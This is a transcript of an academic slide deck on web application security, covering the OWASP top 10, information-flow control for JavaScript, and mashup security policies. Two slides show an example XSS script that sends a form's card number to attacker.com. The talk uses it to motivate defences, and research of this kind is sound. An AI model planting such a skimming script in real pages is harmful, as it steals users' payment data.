Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010...
Transcript of Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010...
![Page 1: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/1.jpg)
Web application security
From fundamental challenges toward practical solutions
Andrei SabelfeldChalmers
![Page 2: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/2.jpg)
Vint Cerf• “Father of Internet”
– TCP/IP protocols
• Now at Google
– Vice President, Engineering
– Chief Internet Evangelist
2
”without security, Internet is incomplete”
”security main challenge for Internet”
![Page 3: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/3.jpg)
Today’s web• Desktop applications
web applications
– sensitive information is spread between a web server and a web client
– both must be protected along with the communication link between them
• Social networksthe end of privacy?
3
![Page 4: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/4.jpg)
4
OWASP top 10, 2010
• A1 - Injection
• A2 - Cross Site Scripting (XSS)
• A3 - Broken Authentication and Session Management
• A4 - Insecure Direct Object Reference
• A5 - Cross Site Request Forgery (CSRF)
• A6 - Security Misconfiguration
• A7 - Insecure Cryptographic Storage
• A8 - Failure to Restrict URL Access
• A9 - Insufficient Transport Layer Protection
• A10 - Unvalidated Redirects and Forwards
![Page 5: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/5.jpg)
5
OWASP top 10, 2010
• A1 – Injection– undesired information flow in server interpreter (SQL)
• A2 - Cross Site Scripting (XSS)– undesired information flow in client script (JavaScript)
• A3 - Broken Authentication and Session Management– undesired information flow (compromise of password, key, auth tokens,…)
• A4 - Insecure Direct Object Reference– undesired information flow on server side (file, directory, db, key,…)
• A5 - Cross Site Request Forgery (CSRF)– undesired information flow in client script (JavaScript)
• A6 - Security Misconfiguration– undesired information flow policy server side
• A7 - Insecure Cryptographic Storage
• A8 - Failure to Restrict URL Access confidentiality and
• A9 - Insufficient Transport Layer Protection integrity threats via
• A10 - Unvalidated Redirects and Forwards insecure information flow
![Page 6: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/6.jpg)
Web application security
• Policy
– Web inherently decentralized
– Need for policies of mutual distrust
• Enforcement
– Dynamic web programming languages
6
• Much of a moving target
- Sanitization, cookies, encryption,…
• But some challenges fundamental:
![Page 7: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/7.jpg)
7
![Page 8: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/8.jpg)
8
<!-- Input validation -->
<form name="cform" action="script.cgi" method="post" onsubmit="return checkform();">
<script type="text/javascript">function checkform () {…}</script>
![Page 9: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/9.jpg)
9
Attack (can be result of XSS)
• Root of the problem: information flow from secret to public
<script>
new Image().src="http://attacker.com/log.cgi?card="+encodeURI(form.CardNumber.value);
</script>
![Page 10: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/10.jpg)
10
Root of problem: information flow
Script
Browser
DOMtree
Internet
![Page 11: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/11.jpg)
11
Origin-based restrictions
Script
Browser
DOMtree
Internet
• Often too restrictive
![Page 12: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/12.jpg)
12
Relaxing origin-based restrictions
Script
Browser
DOMtree
Internet
• Introduces security risks
• Cf. SOP
![Page 13: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/13.jpg)
13
Information flow controls
Script
Browser
DOMtree
Internet
![Page 14: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/14.jpg)
14
Information flow controls
Script
Browser
DOMtree
Internet
![Page 15: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/15.jpg)
Information flowproblem
if secret
public:=1
print(public)
Insecure even when “then” branch not taken –implicit flow
public:=0
• Studied in 70’s
• military systems
• Revival in 90’s
• mobile code
• Hot topic in language-based security in 00’s
• web application security 15
<!-- Input validation -->
<form name="cform" action="script.cgi"
method="post" onsubmit="return checkform();">
<script type="text/javascript">
function checkform () {…
}</script>
new Image().src="http://attacker.com/log.cgi?card="+encodeURI(form.CardNumber.value);
![Page 16: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/16.jpg)
Mashups
![Page 17: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/17.jpg)
The problem
AB
Integrator
<iframe src=“B.html”>
<script src=“B.js”>
NO trust
FULL trust
Iframe gadget
JavaScript gadget
![Page 18: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/18.jpg)
Scenarios
• Dangerous goods
– Google Maps used to track vehicles with dangerous goods
– Full trust in Google Maps
– If Google Maps broken so is dangerous goods web application
• Safe advertising
– Smooth integration of ads desired
– Ads should not maliciously modify web pages
![Page 19: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/19.jpg)
Security lattice [Denning’76]
• Data labeled with security levels
• The higher the more restrictive
• Data is not allowed to flow downward
A B
![Page 20: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/20.jpg)
Lattice-based approach
A
A,B
A B
A,B,C
A,B A,C B,C
A B C
Security levels=sets of Internet domains
![Page 21: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/21.jpg)
Lattice-based model for scenarios
• Dangerous goods
– Corners of the mapdeclassified from dg.com to google.com
• Safe advertisement
– Ad keywords declassifiedfrom my.com to ad.com
• Delimited release [Sabelfeld&Myers’03]
– Only declassified values leak an nothing else21
dg.com google.com
T
my.com ad.com
T
![Page 22: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/22.jpg)
Mutual distrust
• Domain A “owns” a
• Domain B “owns” b
• Is declassification of a+b allowed?
22
Policy(A) Policy(B) Target Allowed?
{(a+b, )} {(a+b, )}
{(a+b, )} {}
{(a+b, )} {} {B}
{(a+b, )} {(b, )}
A.com B.com
T
![Page 23: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/23.jpg)
Enforcement
if secret
public:=1
print(public)
Insecure even when “then” branch not taken –implicit flow
public:=0
23
• Track information flow in dynamic languages
– JavaScript
• Traditional approach:static analysis
– Jif, FlowCaml, SparkAda,...
– Not precise enough
• Challenges
– Eval
– Timeouts
– DOM
– Declassification
![Page 24: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/24.jpg)
Implicit flow channel
• Leaks one bit:
• But can be magnified (h is an n-bit integer):
24
if h¸k then (h:=h-k; l:=l+k)
l:=0;while n¸0 do
k:=2n-1;if h¸k
then (h:=h-k; l:=l+k);n:=n-1;
» l:=h
![Page 25: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/25.jpg)
Termination channel
• Leaks one bit:
• Cannot be magnified
– When secret is non-zero, the attack gets stuck
25
public:=0;(while secret do skip);print(public)
while secret
skip
print(public)
public:=0
![Page 26: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/26.jpg)
Dynamic enforcement
• High-bandwidth implicit flows collapsed into low-bandwidth termination flows
26
if secret
public:=1
print(public)
public:=0
No assignments to public variables in secret context
![Page 27: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/27.jpg)
Collapsing into termination channel
• High-bandwidth channels– Implicit flows [Sabelfeld & Russo’09]
– Declassification [Askarov & Sabelfeld’09]
– DOM tree operations[Russo, Sabelfeld & Chudnov’09]
– Timeouts [Russo & Sabelfeld’09]
– …
• … all collapsed into termination channel• More permissive than static analysis
– “eval” straightforward [Askarov&Sabelfeld’09]
• Security guarantees– No information flow (without declassification)– Composite delimited release 27
if secret
public:=1
print(public)
public:=0
![Page 28: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/28.jpg)
28
Case study by Vogt et al. [NDSS’07]
• Extended Firefox with hybrid “tainting” for JavaScript
• Sensitive information(spec from Netscape Navigator 3.0)
• User prompted an alert whentainted date affects connectionsoutside origin domain
• Crawled >1M pages
• ~8% triggered alert
• reduced to ~1% after whitelistingtop 30 statistics sites (as google-analytics.com)
Object Tainted properties
document cookie, domain, forms,
lastModified, links, referrer, title,
URL
Form action
any form
input
element
checked, defaultChecked,
defaultValue, name,
selectedIndex, toString, value
history current, next, previous, toString
Select
option
defaultSelected, selected, text,
value
location
and Link
hash, host, hostname, href,
pathname, port, protocol, search,
toString
window defaultStatus, status
![Page 29: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/29.jpg)
Enforcement: implementation
• Base for implementation
– Mashup policies [Magazinius, Askarov & Sabelfeld’10]
– Declassification [Askarov & Sabelfeld’09]
– DOM tree operations [Russo, Sabelfeld & Chudnov’09]
– Timeouts [Russo & Sabelfeld’09]
– Output [Rafnsson & Sabelfeld’10]
• Inlining-based implementation [Magazinius,
Russo & Sabelfeld’10]
• FlowSafe project at Mozilla
– dynamic enforcement [Austin & Flanagan’09]29
![Page 30: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/30.jpg)
Conclusions
30
• Web application security is a moving target
– Mutual distrust
– Dynamic web programming languages
• Principled approach
– Lattice-based decentralized security model
– Dynamic enforcement to close high-bandwidth flows
![Page 31: Web application securitycomsec.spb.ru/mmm-acns10/doc/MMM-ACNS2010/Invited... · OWASP top 10, 2010 • A1 - Injection • A2 - Cross Site Scripting (XSS) • A3 - Broken Authentication](https://reader034.fdocuments.in/reader034/viewer/2022050606/5fad9096af157e51217208bb/html5/thumbnails/31.jpg)
Acknowledgements
31
A. Askarov A. Birgisson
W. Rafnsson
J. Magazinius
A. Russo